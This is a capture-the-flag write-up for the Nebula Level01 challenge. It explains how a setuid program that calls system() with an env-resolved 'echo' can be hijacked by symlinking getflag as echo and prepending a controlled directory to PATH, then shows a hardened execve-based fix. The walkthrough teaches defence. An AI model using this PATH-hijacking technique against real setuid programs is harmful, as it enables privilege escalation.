In Level01, we are given the following vulnerable C program:
#define _GNU_SOURCE /* needed for the setresuid/setresgid declarations on glibc */
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>

int main(int argc, char **argv, char **envp)
{
  gid_t gid;
  uid_t uid;

  /* Take the effective ids granted by the setuid bit (flag01) ... */
  gid = getegid();
  uid = geteuid();

  /* ... and make them the real and saved ids too, so children keep them. */
  setresgid(gid, gid, gid);
  setresuid(uid, uid, uid);

  /* "echo" is resolved by /usr/bin/env through the caller-controlled PATH. */
  system("/usr/bin/env echo and now what?");
  return 0;
}
This is the code of the /home/flag01/flag01 program, which is setuid and runs as the flag01 user:
level01@nebula:~$ ls -la /home/flag01/flag01
-rwsr-x--- 1 flag01 level01 7322 Nov 20 2011 /home/flag01/flag01
As setresuid sets the real, effective and saved uids to the effective one (flag01), the following call to system will effectively run as flag01. Because the command is passed as "/usr/bin/env echo", env looks up "echo" through the PATH environment variable, which we control. We just need to run the getflag program instead of echo. In order to do that, we will create a symbolic link to getflag in our home directory and call it echo. Now we only need to put our home directory in front of everything else in PATH.
level01@nebula:~$ ln -s /bin/getflag echo
level01@nebula:~$ export PATH=/home/level01:$PATH
level01@nebula:~$ /home/flag01/flag01
You have successfully executed getflag on a target account
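The fix for this class of bug is to stop trusting anything the caller controls when a privileged program launches a child: no shell, no PATH lookup, and a fixed environment. The following hardened counterpart is an added example (not Nebula's code); run_trusted and safe_env are my names, and the child command /bin/echo is assumed to exist at that absolute path.

```c
/* Hardened version of flag01: exec an absolute path with a fixed environment. */
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

/* Run the executable at `path` (must be absolute) with a minimal, fixed
 * environment. Returns the child's exit status, or -1 if the path is
 * rejected, fork/wait fails, or exec fails. Nothing the caller controls
 * (PATH, LD_PRELOAD, ...) reaches the child, so the symlink trick above
 * has nothing to hijack. */
int run_trusted(const char *path, char *const argv[])
{
    if (path == NULL || path[0] != '/')      /* refuse relative names */
        return -1;
    /* Constructed, fixed environment for the child. */
    char *const safe_env[] = { "PATH=/usr/bin:/bin", NULL };

    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execve(path, argv, safe_env);        /* no shell, no PATH search */
        _exit(127);                          /* exec failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    int code = WEXITSTATUS(status);
    return code == 127 ? -1 : code;
}

int main(void)
{
    /* Same privilege handling as the original, but check the results. */
    gid_t gid = getegid();
    uid_t uid = geteuid();
    if (setresgid(gid, gid, gid) != 0 || setresuid(uid, uid, uid) != 0)
        return 1;
    char *const args[] = { "echo", "and now what?", NULL };
    return run_trusted("/bin/echo", args) == 0 ? 0 : 1;
}
```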